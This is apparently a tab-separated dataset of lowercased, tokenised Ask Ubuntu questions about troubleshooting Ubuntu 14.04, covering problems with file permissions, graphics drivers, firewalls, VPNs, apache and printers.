515961	home files and folders permissions could not be determined	i was trying to create a default configuration file for activemq with the command sudo ./activemq setup [ /etc/default/activemq | /home/leo/.activemqrc ] ` then recieved this message : info : it 's recommend to limit access to '/etc/default/activemq ' to the priviledged user info : ( recommended : chown 'root ' : nogroup '/etc/default/activemq ' ; chmod 600 '/etc/default/activemq ' ) then i changed the owner and permissions of both /etc/default/activemq and /home/leo/.activemqrc with chown root : nogroup ~/activemqrc ; chmod 600 ~/.activemqrc changing the permissions of ~/.activemqrc was undoubtedly a big mistake . i took a look at the permissions on each file and folder on my home and it says : the permissions of `` everything '' could not be determined i no longer can access the directories and files in home . following the answer from permission denied on ~ even though owner listed as me i ran the following command : find ~ -type d -exec chmod 750 \ ; and got this output : find : pred.c:1932 : launch : assertion `starting_desc > = 0 ' failed . is there any way to get back my default configurations ?
515964	hp pavilion tx2514 wacom convertible tablet.. '' wacom isdv4 93 pen stylus '' wont reveal launcher	i have been working on this issue a couple days now . i have installed the latest drivers . i also tried increasing launcher sensitivity using `` compizconfig settings manager '' and to adjust pressure sensitivity . i would like to use my laptop in tablet mode , but cant without turning off auto hide launcher . i would like some real space when working in tablet mode .
515965	âthe system is running in low-graphics modeâ & ctrl alt fn does n't work	after an upgrade from 12.04 lts to 14.04 lts , problems did n't stop . i wo n't list them here . it 's not the subject . anyway . after , apt-get remove gnome* and installation of xubuntu-desktop , every time i boot , i get the error message . i tried to maintain shift button pushed to get access to grub . nothing . i tried ctrl+alt+f1,2,3,4,5,6 to access to a terminal , nothing . when i click on ok button , it shows me a window with another question : what would you like to do ? run in low graphics ... -- > it freezes . reconfigure graphics . -- > it does n't work ( another window , another question ) troubleshoot the error -- > does n't work exit to cosole login -- > does n't work it 's a dell precision m4800 . it 's due to the guarantee that i kept ubuntu . i performed one upgrade and i had a thousand problems ! thank you for helping .
515966	seamonkey wo n't open links from skype	when i open a link from skype in seamonkey , it wo n't open the link , but opens the temporary copy of the webpage from my harddisk . the link in sm looks like file : ///var/tmp/kdecache-dimitry/ ... ... in firefox the kink opens fine . is there anything to do about this issue ?
515967	problem with ufw	following this tutorial i executed the following commands : sudo apt-get install ufw sudo ufw allow ssh sudo ufw allow http sudo ufw enable sudo ufw status verbose and i get : status : active logging : on ( low ) default : deny ( incoming ) , allow ( outgoing ) new profiles : skip to action from -- -- -- -- -- -- 22 allow in anywhere 80 allow in anywhere 22 allow in anywhere ( v6 ) 80 allow in anywhere ( v6 ) ssh is working , but browser ca n't reach my page ! when i disable ufw ( sudo ufw disable ) then my browser can access apache . can someone explain me what 's happening with ufw ?
515969	how to solve the error after setup an ubuntu in my pc	i have windows 7 my computer . now i tried to install ubuntu 12.04 in my pc . after installting the ubuntu pc suddenly took restart and after that i see this image on my screen , when the pc starts . is there any way to solve this ? i can not go into my windows 7 too . edit : now i have inserted the ubuntu dvd to set up again.i go to the boot option and i clicked f12 but same erroor appears again . edit again : after using the `` try ubuntu '' i got this display i wrote the terminal as you suggested . where to find the ubuntu repair now/ . ?
515970	after upgrade to ub 14.04	i want to free disk space . so i want to remove the files associated with ub 12.04 lts and the many upgrades over the last 2 years . i have upgraded to ub 14.04 and it works extremely well . many gbs could be freed up if i can remove / delete the older files . i use and love ubuntu dual boot [ win7 ultimate and ubuntu 14.04 , but really can not use command line , unless i can copy and paste each line of code into terminal , line by line . please help ! ! ! ! my 256 gb ssd is in 4 partitions . 50gb win7 , 35gb ext4 ub 14.04 , 2 gb swap file , 147 gb ntfs for my files & info . my ext4 partition has only 7gb free . i keep all my files on the files partition . 147gb . thanks , kye mark , i moved 2 gb to non ub partition , thank you . bcbc , paul @ u6910p-2 : ~ $ ls /boot/vmlinuz-* /boot/vmlinuz-3.0.0-12-generic /boot/vmlinuz-3.13.0-34-generic /boot/vmlinuz-3.13.0-33-generic /boot/vmlinuz-3.2.0-67-generi i assume i can use synaptic package mgr and possibly remove 3.13.0-34 , i will not until i see your suggestion . thank you .
515971	file is n't where locate says it is	i 'm trying to find a certain file for apache so i used the locate command to find it , however , when i go to the directory that locate says it is in , the file is n't there . does anyone know why this might be ? i 've tried switching to the super user but it still does n't show up . thanks !
515977	qtcreator does not start up	i have installed qt creator using ubuntu software center but when i try to run it nothing happens . there is no error message , no new process , no new window .
515978	sharp ar 153 en driver	i ca n't find drivers or ppd files for sharp ar 153 en . does somebody know about it or some alternative ? regards !
515979	where does `resolvconf` gets the ips of dns servers from ?	on a server machine , i have the /etc/network/interfaces file similar to : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.1.35 netmask 255.255.252.0 network 192.168.0.0 broadcast 192.168.3.255 gateway 192.168.1.1 dns-nameservers 192.168.1.3 192.168.1.4 dns-search example.com when running resolvconf -u , the /etc/resolv.conf file becomes : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 192.168.1.3 nameserver 192.168.1.4 search pelicandd.com # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 192.168.1.13 why is there a nameserver 192.168.1.13 ?
515982	unable to connect to vpn using gnome-network-manager	i originally wanted auto-connect vpn upon login , but after much trial and error and connection issues it looks like my network manager is corrupt . unity ubuntu 1404 when i try to connect via clicking wifi- > vpn connections- > ( my vpn ) i am getting no acknowlegment from the gui that it could not connect . when i tail /var/log/syslog i get aug 25 19:59:01 networkmanager [ 1041 ] : < warn > nl_recvmsgs ( ) error : ( -33 ) dump inconsistency detected , interrupted aug 25 20:00:07 networkmanager [ 1041 ] : < info > starting vpn service 'openvpn ' ... aug 25 20:00:07 networkmanager [ 1041 ] : < info > vpn service 'openvpn ' started ( org.freedesktop.networkmanager.openvpn ) , pid 3544 aug 25 20:00:07 networkmanager [ 1041 ] : < info > vpn service 'openvpn ' appeared ; activating connections aug 25 20:00:07 networkmanager [ 1041 ] : < error > [ 1408993207.745279 ] [ nm-vpn-connection.c:1374 ] get_secrets_cb ( ) : failed to request vpn secrets # 2 : ( 6 ) no agents were available for this request . aug 25 20:00:07 networkmanager [ 1041 ] : < info > policy set 'my wifi conn ' ( wlan0 ) as default for ipv4 routing and dns . aug 25 20:00:13 networkmanager [ 1041 ] : < info > vpn service 'openvpn ' disappeared
515983	sudo apt-get -f install error	i 'm a ubuntu noob and whenever i try to download something there a bunch of unmet wine dependencies , i go to run sudo apt-get -f install and get this . bailey @ bailey-fq565aa-aba-a6700f : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libkresources4 libqrencode3 libkprintutils4 libqscintilla2-8 libsm-dev libkldap4 ttf-umefont libice-dev libkcalcore4 libprison0 gir1.2-ubuntuoneui-3.0 libkholidays4 libknewstuff2-4 libpthread-stubs0 linux-headers-3.2.0-55 python-qscintilla2 linux-headers-3.2.0-55-generic nvidia-settings-304-updates libakonadi-kmime4 libakonadiprotocolinternals1 mysql-server-core-5.5 wine-mono0.0.8 akonadi-backend-mysql x11proto-kb-dev libkmbox4 xtrans-dev libkcalutils4 akonadi-server libmicroblog4 wine-gecko2.21 wine-gecko2.21 : i386 wine-gecko1.4 wine-gecko1.4 : i386 x11proto-input-dev libkabc4 mysql-client-core-5.5 libxt-dev linux-headers-3.5.0-23-generic libkcal4 libkalarmcal2 libakonadi-calendar4 language-pack-kde-en linux-headers-3.5.0-23 libkimap4 libxau-dev kde-l10n-engb libmailtransport4 libubuntuoneui-3.0-1 openjdk-7-jre-lib libkpimtextedit4 libkmime4 kdepimlibs-kio-plugins ttf-unfonts-core thunderbird-globalmenu xorg-sgml-doctools libakonadi-kabc4 libx11-dev libkpimidentities4 libkpimutils4 libx11-doc libxcb1-dev language-pack-kde-en-base kdepim-runtime libakonadi-kcal4 x11proto-core-dev libakonadi-notes4 libxdmcp-dev libpthread-stubs0-dev libakonadi-contact4 libakonadi-kde4 python-kde4 libdmtx0a use 'apt-get autoremove ' to remove them . the following extra packages will be installed : wine1.7 wine1.7-amd64 wine1.7-i386 : i386 suggested packages : dosbox : any recommended packages : wine-gecko2.24 the following packages will be upgraded : wine1.7 wine1.7-amd64 wine1.7-i386 : i386 3 upgraded , 0 newly installed , 0 to remove and 305 not upgraded . 3 not fully installed or removed . need to get 0 b/58.2 mb of archives . after this operation , 7,751 kb of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of wine1.7 : wine1.7 depends on wine1.7-i386 ( = 1:1.7.15-0ubuntu1 ) ; however : package wine1.7-i386 is not installed . version of wine1.7-i386 : i386 on system is 1:1.7.16-0ubuntu1 . dpkg : error processing wine1.7 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine1.7-i386 : i386 : wine1.7-i386 : i386 depends on wine1.7 : any ( = 1:1.7.16-0ubuntu1 ) ; however : version of wine1.7 on system is 1:1.7.15-0ubuntu1 . dpkg : error processing wine1.7-i386 : i386 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of wine1.7-amd64 : wine1.7-amd64 depends on wine1.7 : any ( = 1:1.7.15-0ubuntu1 ) ; however : package wine1.7 is not configured yet . dpkg : error processing wine1.7-amd64 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : wine1.7 wine1.7-i386 : i386 wine1.7-amd64 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
515984	dual boot 14.04 with windows 7on second disk ( sdb ) , bios loader	i have windows 7 on a separate disk ( sdb ) as it came from the factory . to protect it i disconnected it while installing ubuntu 14.04 on the sda disk . then i connected the sdb drive and expected to see a choice in the boot menu for booting windows 7 . but it was not there . i 'm pretty sure i followed the same procedure when i upgraded to 12.04 and it worked then . it looks like i have to modify grub to get it to see windows 7 on sdb . could you recommend a safe way to do this ? is there a tool that i can use ? thanks in advance ...
515985	how to upgrade old 11.04 to lastest version	i was gifted with an ibm thinkpad which is running ubuntu 11.04 . the device does not have a dvd portal ... so how do i upgrade to ubuntu 14.04.1 lts ?
515989	how do i run terminal code on startup and running vpn on startup ?	i want to run this code on startup to fix my laptop from skipping brightness levels when i press the brightness up and down buttons : sudo sh -c 'echo -n 0 > /sys/module/video/parameters/brightness_switch_enabled' i also want to auto connect to my vpn on startup . i 'm using ubuntu 14.04 lts with gnome and i have set up my vpn already in the settings .
515994	nvidia x server settings only shows 1 screen ( laptop + external monitor connected )	i have recently installed a new copy of ubuntu 14.04 on my dell m3800 which has nvidia quadro k1100m graphics card . later i also connected my external monitor via hdmi ( hdmi to dvi connector ) . then i started seeing sluggish screen performance on my laptop screen . by sluggish i mean that my keystrokes or actions seems to be always lagging . funny enough this seems to happen only on my laptop screen , my external monitor works fine . i have made sure to install & use nvidia 's proprietary drivers 331.38 . so i checked my ssytem settings > displays . and it properly displays 2 screeens as seen below . but then i went to nvidia x server settings & it displays just one screen with one big screen resolution as seen below . i think this is causing my laptop to have sluggish performance because i am assuming that botht the external monitor & my laptop screen have a different screen refresh rate . i am dumping xorg.conf & xandr output below , # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 331.38 ( buildmeister @ swio-display-x64-rhel04-15 ) wed jan 8 19:53:14 pst 2014 section `` serverlayout '' identifier `` layout '' screen 0 `` nvidia '' 0 0 inactive `` intel '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` keyboard '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` intel '' driver `` modesetting '' busid `` pci:0 @ 0:2:0 '' endsection section `` device '' identifier `` nvidia '' driver `` nvidia '' busid `` pci:2 @ 0:0:0 '' endsection section `` screen '' identifier `` intel '' device `` intel '' monitor `` monitor0 '' endsection section `` screen '' identifier `` nvidia '' device `` nvidia '' monitor `` monitor0 '' option `` allowemptyinitialconfiguration '' `` on '' option `` constraincursor '' `` off '' subsection `` display '' modes `` nvidia-auto-select '' endsubsection endsection xrandr output , cdtank @ cdtank-dell-precision-m3800 : ~/work $ xrandr screen 0 : minimum 8 x 8 , current 3840 x 1080 , maximum 16384 x 16384 edp-1-0 connected 1920x1080+0+0 344mm x 193mm 1920x1080 60.0*+ 59.9 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 60.0 960x720 60.0 928x696 60.1 896x672 60.0 960x600 60.0 960x540 60.0 800x600 60.0 60.3 56.2 840x525 60.0 59.9 800x512 60.2 700x525 60.0 640x512 60.0 720x450 59.9 640x480 60.0 59.9 680x384 59.8 60.0 576x432 60.1 512x384 60.0 400x300 60.3 56.3 320x240 60.1 vga-1-0 disconnected hdmi-1-0 connected 1920x1080+1920+0 598mm x 336mm 1920x1080 60.0*+ 1600x1200 60.0 1680x1050 59.9 1400x1050 59.9 1600x900 60.0 1280x1024 75.0 60.0 1440x900 59.9 1280x960 60.0 1280x800 59.9 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 75.0 72.8 66.7 60.0 720x400 70.1 displayport-1-0 disconnected hdmi-1-1 disconnected update after removing the xorg.conf & rebooting . here is the contents of it . section `` serverlayout '' identifier `` layout '' screen 0 `` nvidia '' inactive `` intel '' endsection section `` device '' identifier `` intel '' driver `` modesetting '' busid `` pci:0 @ 0:2:0 '' endsection section `` screen '' identifier `` intel '' device `` intel '' endsection section `` device '' identifier `` nvidia '' driver `` nvidia '' busid `` pci:2 @ 0:0:0 '' option `` constraincursor '' `` off '' endsection section `` screen '' identifier `` nvidia '' device `` nvidia '' option `` allowemptyinitialconfiguration '' `` on '' endsection
515995	ca n't boot from usb , why ubuntu 14.04 in efi mode goes directly to grub ?	ok , i installed ubuntu 14.04 lts on a machine that formerly had windows 8 ( completely removed it ) with uefi , as far as i know , ubuntu was installed in efi mode , this was confirmed with some commands i can not recall at this moment . now , i want to install kali 1.0.8 wich support efi mode but when i restart my computer with a usb stick plugged ( made bootable with the method showed in this best answer ) it directly loads grub . i already went to the bios setup and moved the usb hdd to the top of the boot priorities ( efi mode not legacy ) . i would appreciate any kind of help , thanks .
515998	where do i find ubuntu user magazine purchase from ubuntu software center ?	i purchased an ubuntu user magazine in the ubuntu software center . it shows as `` installed on 2014-08-25 '' . and the button on the right gives me a chance to [ remove ] . but i have n't been able to locate the file , if a file was downloaded . alternatively , i do n't know where i should download the file from .
515999	installed 4th graphics card ; now system is running in low-graphics mode	i had 2 titan blacks and 1 titan . the system worked fine ; after initial problems with nvidia-driver related black screen which i was able to fix . today i added a fourth titan black ( 3 asus titan black and 1 evga titan ) ( i also upgraded my psu before adding the new card to a corsair 1500i , from the 1200 . this worked fine ) . when i switched on my system i got the following error : the system is running in low-graphics mode your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . i am using ubuntu version 14.04 . update : i restarted the computer and this time the mouse and keyboard were n't recognised/responsive . i then unplugged my usb wifi and restarted again . this time ubuntu loaded without any problems . could it be a problem with my psu ?
516001	skype problems , `` wrong architecture 'i386 ' `` what is wrong ?	so i recently bought samsung chromebook ( http : //www.samsung.com/us/computer/chrome-os-devices/xe303c12-a01us ) this one , and because the chrome os system does n't support the skype program i decided to change to ubuntu . but now i 'm still having problems installing it , i have been trying for 2 days now and felt like it was time to ask for help .
516002	is there a plan to merge ubuntu and ubuntu touch ?	i heard that ubuntu was going for full convergence , which means , as far as i can tell , running basically the same operating system across phones , tablets , pc 's and tv 's , by 14.04 . those plans are delayed , and now we have separate ubuntu and ubuntu touch . still , mark shuttleworth is talking about convergence , so i guess the plan is the same . did i get it right ; is merging ubuntu and ubuntu touch actually in the plans for some later date ? i would like to be able to run ubuntu on arm nexus 7 and ubuntu touch on x86 surface pro 2 , at some point in the future , even if not anytime soon .
516007	problems with ubuntu sdk	i 've installed ubuntu sdk according to the link below http : //developer.ubuntu.com/start/ but during the installation i received the message the following packages have unmet dependencies : qtcreator : breaks : qtcreator-plugin-ubuntu ( < = 3.1.0~ ) but 2.7.2-0ubuntu5 is installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies does anyone have any idea as to how to resolve this ?
516012	same program , different version , in different locations ... how to specify which to use ?	hi all i 'm trying to run a program called cufflinks on my machine , however there appears to be a version of this in multiple places on my existing system . for example when i typed whereis cufflinks i get a few directories . i have downloaded the executables ( cufflinks comes with other related programs ) and so-far i 've been just doing something like /myownbing/cufflinks - and it works until it tries to call other cufflink programs and it says my version is not updated because it tries to run the default . is there anyway i can tell my system to use only my veresion ? eg /myownbing/cufflinks instead ? i do n't have admin rights because it prohibits me to type in sudo anything . thanks in advance . ahdee
516014	installing samsung network printer on ubuntu 14.04	i am trying to install samsung c410w printer on ubuntu 14.04 , however after 2 days of struggling any success . i tried to install it through `` add printer '' , through adding printer in cups and i tried also suldr . i tried to connect it through wps to my router what changed the ip address of printer , however after trying to print something i always got `` unable to send data to printer '' or `` unable to connect to network printer '' . i was hoping in using syncthru web service , however http : //ip_address_of_pritner did n't load . any help would be appreciated .
516017	14.04 keystrokes do n't register at screen lock	i have a ps2/usb linksys kvm switch and a belkin usb keyboard . at screen lock , keystrokes do n't register at `` password '' on lock screen . when i switch to a ctl+alt+f1 screen , my keystrokes register nothing apparent . then i hit enter , the login fails . i try again , this time i see a carot symbol , a left square bracket and then the letter i type . so if i type `` abc '' i see `` carot left bracket a '' `` carot left bracket b '' `` carot left bracket c '' have n't had this problem before when working with linux . any ideas ? dave ps i just switched back to tty and then back again to alt ctl f7 and the display captured my keystrokes properly . any idea what 's happening here ? thanks !
516018	ubuntu14.04 and ports as seen on windows	is there any way for my laptop which has ubuntu 14.04 and wine installed on it , seethe ports such as usb the same way as windows ? i have specific software that does not see the e : \ drive where the usb is . ubuntu sees the device that is plugged in on the laptop as a local drive , different than windows .
516021	can not load /usr/lib/apache2/modules/mod_mpm_itk.so	i ran tasksel to install lamp server , but i accidentally delete everything , when i got everything work as before i noticed that apache is not working and here is there message i get while trying to restart the service the apache2 configtest failed . output of config test was : apache2 : syntax error on line 140 of /etc/apache2/apache2.conf : syntax error on line 2 of /etc/apache2/mods-enabled/mpm_itk.load : can not load /usr/lib/apache2/modules/mod_mpm_itk.so into server : /usr/lib/apache2/modules/mod_mpm_itk.so : file too short action 'configtest ' failed . the apache error log may have more information . any sol ?
516023	how to transfer files from samsung galaxy ?	: ) i have a samsung galaxy that does n't communicate very easily with any computer ... i want to be able to transfer files ( now i email them one by one ... , nope do n't have cardreader either ) i found an answer here regarding a similar issue , ( how to transfer files between android and ubuntu ? ) suggesting to download the app ftp . it says it is free , however i find it as a paypal service . unfortunately i am not able to install/use paypal ... any details i 've missed ? thanks for the help ! /isabelle
516024	idl desktop gui ( idlde ) not working after upgrade to ubuntu 14.04	i recently upgraded to ubuntu trusty 14.04 from 12.04 i have idl software package that i use for my research . after the upgrade i am not able to open the idl desktop gui version ( idlde ) . but i can open and use idl in terminal . there is no error message or anything . i fear it might be related to java libraries . please help thanks
516025	gnome 3.12 logout button gone from menu	logout entry from gnome menu has disappeared all of a sudden . how can i get it back ? i 'm using ubuntu 14.04 64bit wit gnome 3.12
516027	do you know some free software to set up a language lab ?	the alternatives i 've seen are privative . they join a classroom-control software with a multimedia-editor software . in the first type , i think italc ( http : //italc.sourceforge.net ) or epoptes ( http : //www.epoptes.org ) could do the job . in the second type , i think a combination of vlc with audacity could do the job too ( am i right ? ? ) , but there are some features i ca n't get . for instance , i can see in easylab website ( http : //www.easylab.es/en/features/features.php ) several features i do n't know how to find in the free world : *the ability to include bookmarks and comments in any part of the audio or video sequence . -- - > which software can do that ? ? *wave graphs which allow a visual comparison to be made of the differences in pronunciation between the original â¨masterâ¨ recording track and the student 's recording track . -- -- > which software can do that ? ? ? *simultaneous translation function . -- - > which software can do that ? ? ? *control over playback speed . -- - > can vlc/audacity do that ? ? ? ? *video subtitle function . -- -- > well , something like aegisub , gnome-subtitle ... i would need to investigate thanks a lot
516029	connect to my college 's wpa from ubuntu 14.04 lts	i have ubuntu 14.04 lts , and am running it on a sony vaio vgn-cr12oe . it is the only operating system . i am trying to connect to my college 's wpa wifi . my settings for this wifi connection are as follows : security : wpa & wpa2 enterprise authentication : protected eap ( peap ) anonymous identity : < i 've been leaving this field blank > ca certificate : addtrust_external_root.crt < see below fixes i have already tried > peap version : automatic inner authentication : mschapv2 username : < my username > password : < my password > warns me that i have n't attached a ca certificate keeps warning that i do n't have one , regardless of whether i check `` do n't warn me again '' and click `` ignore '' . i give ca certificate from /usr/share/ca-certificates/mozilla/addtrust_external_root.crt stops warning me that i do n't have ca certificate when i try to connect , it keeps prompting for password i tried checking the box found at wifi menu > edit connections > `` general '' tab > `` all users may connect to this network '' still keeps prompting for password
516033	how to have websites fit the screen ?	on high resolution screens websites are mostly blank.how to have them stretched to fit the screen ? i 've tried internet explorer and opera and on linux too : firefox and chrome
516039	xserver error `` ( ee ) module abi major version ( 6 ) does n't match the server 's version ( 8 ) ''	i have upgraded ubuntu from 12.04 to 14.04 . afterwards , xserver could n't start . i have downloaded the latest nvidia drivers from here and rebooted . grub now has the following entries : *ubuntu advanced options for ubuntu memory test ( memtest86+ ) memory test ( memtest86+ , serial console 115200 ) when selecting `` advanced options for ubuntu '' the following entries are displayed : ubuntu , with linux 3.13.0-34-generic ubuntu , with linux 3.13.0-34-generic ( recovery mode ) ubuntu , with linux 3.5.0-54-generic ubuntu , with linux 3.5.0-54-generic ( recovery mode ) ubuntu , with linux 3.5.0-47-generic ubuntu , with linux 3.5.0-47-generic ( recovery mode ) ubuntu , with linux 3.5.0-46-generic ubuntu , with linux 3.5.0-46-generic ( recovery mode ) ubuntu , with linux 3.5.0-44-generic ubuntu , with linux 3.5.0-44-generic ( recovery mode ) ubuntu , with linux 3.5.0-42-generic ubuntu , with linux 3.5.0-42-generic ( recovery mode ) ubuntu , with linux 3.5.0-41-generic ubuntu , with linux 3.5.0-41-generic ( recovery mode ) ubuntu , with linux 3.5.0-40-generic ubuntu , with linux 3.5.0-40-generic ( recovery mode ) ubuntu , with linux 3.5.0-23-generic ubuntu , with linux 3.5.0-23-generic ( recovery mode ) after , installing the drivers , however , selecting any non recovery entry would lead to a black screen with a blinking cursor . after booting into recovery mode i have deleted all nvidia drivers by running : sudo ./usr/bin/nvidia-installer -- uninstall now i could again boot from any kernel without gui enabled . i 've tried starting xserver from the command line by running : startx an error related to ~/.xauthority has occured . running the command again as root threw the error : failed to insert nvidia . no such symbol next , i tried reinstalling xserver : sudo apt-get install -- reinstall xorg the command was run successfully but i 'm now getting the following errors when attempting to startx : ( ee ) module abi major version ( 6 ) does n't match the server 's version ( 8 ) xinit : connection to x server lost waiting for x server to shut down ( ee ) server terminated successfully ( 0 ) . closing log file . why does this occur ? edit # 1 : i have installed nvidia-current-updates : sudo apt-get install nvidia-current-updates and ran startx again . the output was : xauthl : timeout in locking authority file ~/.xauthority afterwards , the screen kept flashing . i had to jump into terminal mode . the output is as follows : waiting for x server to accept connections and a screen of lines : no protocol specified edit # 2 : after removing the .xauthority file and running startx the following error is shown : ( ee ) module abi major version ( 6 ) does n't match the server 's version ( 8 ) xinit : connection to x server lost waiting for x server to shut down ( ee ) server terminated successfully ( 0 ) . closing log file .
516041	lubuntu asking for password after inactivity despite settings	i 've got a laptop with a fresh install of lubuntu 14.04.1 amd64 . i set all the settings that i could find in the menu button > preferences menus that might affect this . even still , after a period of inactivity , it wants a password when it wakes up . i 'm not sure if closing the lid on the laptop is involved or not . closing the lid of the laptop does n't affect it , it does it with lid open or closed ( must be dependent upon length of time idle ) . what setting might be causing this ? thanks
516043	android studio does n't launch ( arm chromebook )	i have recently installed ubuntu with xfce on my arm chromebook , when i try to launch android studio ( which i downloaded from a ppa : following this article i then launched it , it said it did n't like openjdk 6 so i installed oracle jdk 8 ) now , whenever i try to run it , nothing happens . this is the first time have used ubuntu , so i do n't know where to get logs , let me know and i will try to find them .
516044	using ubuntu 14.04 as router with iptables , clients ca n't go online . probably dns issue , iptables setting needed	i 've read through a large number of posts about iptables issues when using linux as a router , but none could help me with the following : i am setting up a number of student workstations in our university department , where we have limited ip 's in a vlan . the workstations need to communicate with each other and go online . they explicitly should not be reachable from the internet . instead of giving each workstation one of the rare ip 's in the university vlan i want to use the following setup : we have a server which is running ubuntu 14.04 server with 4 ethernet ports ( i use 2 for this setup ) . 1st port is em1 and is plugged into a l2-switch together with all the workstations . 2nd port is em2 and is plugged into the university vlan . first the problem , then my setup : i can reach the server via ssh over the web , i can ping 8.8.8.8 , www.example.com and other 192.168.99.x clients in the lan from it , so for that one all works fine . the clients can ping each other , also 8.8.8.8 , but not www.example.com . that is why i am thinking i need another iptable setting for the dns . same in any browser , i ca n't resolve external websites . in the windows clients , the network settings show connection to the internet , in the linux clients , things like wget and apt-get install work . i have tried manually setting the google dns servers 8.8.8.8 and 8.8.4.4 for the clients , but to no avail , even though they can ping them . correction : the wget/apt-get stuff seems to work only sometimes . correction 2 : i had a typo in at least one of the dns entries for one client , i will try the rest tommorow and then mark this as closed . settings etc . : i have activated forwarding in the kernel by uncommenting net.ipv4.ip_forward=1 in /etc/sysctl.conf . my /etc/network/interfaces entries for the 2 ethernet ports look like this : auto em2 iface em2 inet static address x.x.x.x netmask x.x.x.x network x.x.x.x gateway x.x.x.x dns-nameservers x.x.x.x x.x.x.x dns-search x.example.com pre-up iptables-restore < /etc/network/iptables.up.rules post-down iptables-save > /etc/network/iptables.up.rules auto em1 iface em1 inet static address 192.168.99.252 netmask 255.255.255.128 pre-up iptables-restore < /etc/network/iptables.up.rules post-down iptables-save > /etc/network/iptables.up.rules ( the em2 parameters are redacted for privacy reasons , but i do n't think they play a role here . please note we have two internal dns servers , this might play a role in the problem ? ) i also have setup iptables with sudo iptables -t nat -a postrouting -o em2 -j masquerade so sudo iptables -t nat -l gives me : chain prerouting ( policy accept ) target prot opt source destination chain input ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination chain postrouting ( policy accept ) target prot opt source destination masquerade all -- anywhere anywhere masquerade all -- anywhere anywhere ( that second entry must have happened by accident , but should n't be concerning , right ? ) all the clients have static ip 's with the following settings : ip : 192.168.99.22 or similar subnetmask : 255.255.255.128 gateway : 192.168.99.252 i do n't know how to set this last piece of the puzzle up , or what would be exactly needed here . i am thinking that another iptables settings is necessary for the dns but i do n't know what exactly . help is greatly apprecieated , thanks in advance ! ( i have also heard about other ways of setting this up , but i would be interested if the way i have started this is doable ) .
516045	how do i install tomoe of any pen recognition software that supports chinese writing in ubuntu 14.04 ?	i need help installing tomoe or any other chinese pen recognition software for ubuntu 14.04 . im really new to ubuntu especially ubuntu 14.04. ive googled countless times on how to install tomoe or any other software but it isnt very explicit or it doesnt work . for example , i tried installing hanzi dictionary that was said to work for ubuntu 10.04 but it didnt work for 14.04 . other websites direct me to sourceforge.net for tomoe packages but when i install them i dont know what to do with them because of my lack of experience with ubuntu and its terminal . please guide me through everything thoroughly and with simplicity on installing a chinese pen recognition software . any help will be appreciated .
516047	how can i create torrent files from transmission or deluge using gui ?	i ca n't find anywhere to 'create file ' in transmission/deluge .
516048	without windows present will wine compromise my kernel ?	i plan on getting a gaming pc and dont want malware on my hardware ( windows ) ; however i want to be able to play windows games downloaded from steam , as steamos has not officially launched . is wine my only choice or are there alternatives ? i ask this as i know there will be ports to steamos but this will take time . note that windows is not present on my pc , so will programs that grant support for such programs become a threat to my system ? will compatibility programs through linux hinder performance of .exe games ? this is important as i am about to drop north of $ 1,000 u.s. on a rig .
516050	my ubuntu is not booting after upgrading to 14.04 lts and installing cairodock ?	i have upgraded my os from 12.04 to 14.04 and installed cairo dock.. after that when i click shutdown , the system hangs . so i shut down it by the press and holding power key . after that ubuntu is not booting . after ubuntu splash screen a blank screen appears . i have tried tboot repair . but its not working . this is boot repair report.. http : //paste.ubuntu.com/8144487/ someone.. please help me ... .. http : //www.flipkart.com/toshiba-satellite-c850-i5010-laptop-2nd-gen-ci3-2gb-500gb-no-os/p/itmd9yvpckdyeagv this is my laptop
516054	annoying uinlock keyring	running ubuntu 14.04 lts ( 64bit ) how to get rid of the pesky ( ! ) `` unlock keyring '' password demand when evolution first fires up ? i have tried deleting keyring file in .gnome2 as recommended elsewhere but i still get the message popup
516057	ubuntu - upload csv file using mysql	i 'm trying to upload a csv file to a mysql table and it keep giving me an error . i am in mysql using the database i want to upload the file . i 've tried two queries at the command line . load data local '/home/susan/ahref.csv ' replace into table ahrefrealtor fields terminated by ' , ' lines terminated by '\n ' ; i get this error load data linkprofile '/home/susan/ahref.csv ' replace into table ahrefrealtor ; error 1064 ( 42000 ) : you have an error in your sql syntax ; check the manual that corresponds to your mysql server version for the right syntax to use near 'linkprofile '/home/susan/ahref.csv ' replace into table ahrefrealtor ' at line 1 2nd query load data local '/home/susan/ahref.csv ' replace into table ahrefrealtor fields terminated by ' , ' lines terminated by '\n ' ; same error
